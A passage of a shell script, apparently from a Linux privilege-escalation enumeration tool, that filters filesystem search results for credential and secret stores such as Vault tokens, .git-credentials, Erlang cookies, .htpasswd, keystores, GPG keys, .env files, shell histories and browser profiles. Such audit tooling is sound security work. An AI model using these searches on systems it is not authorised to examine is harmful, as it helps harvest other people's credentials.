PSTORAGE_LOGSTASH=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "logstash$" | sort | uniq | head -n 70) + PSTORAGE_ELASTICSEARCH=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "elasticsearch\.y.*ml$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_HELPER=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "vault-ssh-helper\.hcl$" | sort | uniq | head -n 70) + PSTORAGE_VAULT_SSH_TOKEN=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "\.vault-token$" | sort | uniq | head -n 70) + PSTORAGE_COUCHDB=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "couchdb$" | sort | uniq | head -n 70) + PSTORAGE_REDIS=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "redis\.conf$" | sort | uniq | head -n 70) + PSTORAGE_MOSQUITTO=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "mosquitto\.conf$" | sort | uniq | head -n 70) + PSTORAGE_NEO4J=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "neo4j$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_INIT=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "cloud\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_ERLANG=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "\.erlang\.cookie$" | sort | uniq | head -n 70) + PSTORAGE_GMV_AUTH=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "gvm-tools\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IPSEC=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "ipsec\.secrets$|ipsec\.conf$" | sort | uniq | head -n 70) + PSTORAGE_IRSSI=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "\.irssi$" | sort | uniq | head -n 70) + PSTORAGE_KEYRING=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA\n$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "keyrings$|.*\.keyring$|.*\.keystore$|.*\.jks$" | sort | uniq | head -n 70) + PSTORAGE_FILEZILLA=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA\n$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "filezilla$|filezilla\.xml$|recentservers\.xml$" | sort | uniq | head -n 70) + PSTORAGE_BACKUP_MANAGER=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "storage\.php$|database\.php$" | sort | uniq | head -n 70) + PSTORAGE_SPLUNK=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "passwd$" | sort | uniq | head -n 70) + PSTORAGE_GITLAB=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -v -E '/lib' | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "secrets\.yml$|gitlab\.yml$|gitlab\.rm$" | sort | uniq | head -n 70) + PSTORAGE_PGP_GPG=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -v -E 'README.gnupg' | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E ".*\.pgp$|.*\.gpg$|.*\.gnupg$" | sort | uniq | head -n 70) + PSTORAGE_CACHE_VI=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E ".*\.swp$|.*\.viminfo$" | sort | uniq | head -n 70) + PSTORAGE_DOCKER=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "docker\.socket$|docker\.sock$|Dockerfile$|docker-compose\.yml$" | sort | uniq | head -n 70) + PSTORAGE_FIREFOX=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^" | grep -E "\.mozilla$" | sort | uniq | head -n 70) + PSTORAGE_CHROME=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^" | grep -E "google-chrome$" | sort | uniq | head -n 70) + PSTORAGE_AUTOLOGIN=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "autologin$|autologin\.conf$" | sort | uniq | head -n 70) + PSTORAGE_FASTCGI=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "fastcgi_params$" | sort | uniq | head -n 70) + PSTORAGE_SNMP=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "snmpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_PYPIRC=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "\.pypirc$" | sort | uniq | head -n 70) + PSTORAGE_CLOUDFLARE=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "\.cloudflared$" | sort | uniq | head -n 70) + PSTORAGE_HISTORY=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "\..*_history\..*$" | sort | uniq | head -n 70) + PSTORAGE_HTTP_CONF=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "httpd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_HTPASSWD=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "\.htpasswd$" | sort | uniq | head -n 70) + PSTORAGE_LDAPRC=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "\.ldaprc$" | sort | uniq | head -n 70) + PSTORAGE_ENV=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "\.env$" | sort | uniq | head -n 70) + PSTORAGE_MSMTPRC=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "\.msmtprc$" | sort | uniq | head -n 70) + PSTORAGE_GITHUB=$(echo -e "$FIND_LIB64\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_SYS\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_ETC\n$FIND_USR\n$FIND_SNAP\n$FIND_OPT\n$FIND_SBIN\n$FIND_SRV\n$FIND_CDROM\n$FIND_BIN\n$FIND_LIB32\n$FIND_VAR\n$FIND_SYSTEMD\n$FIND_APPLICATIONS\n$FIND_MNT\n$FIND_LIB\n$FIND_MEDIA" | grep -E "^/snap|^/opt|^/bin|^/applications|^$GREPHOMESEARCH|^/media|^/srv|^/.cache|^/var|^/cdrom|^/etc|^/usr|^/tmp|^/mnt|^/private|^/sbin" | grep -E "\.github$|\.gitconfig$|\.git-credentials$|\.git$" | sort | uniq | head -n 70) + PSTORAGE_SVN=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_PRIVATE\n$FIND_DIR_TMP\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_ETC\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_OPT\n$FIND_DIR_SBIN\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_SRV\n$FIND_DIR_BIN\n$FIND_DIR_MNT\n$FIND_DIR_SNAP\n$FIND_DIR_CDROM\n$FIND_DIR_CACHE" | grep -E 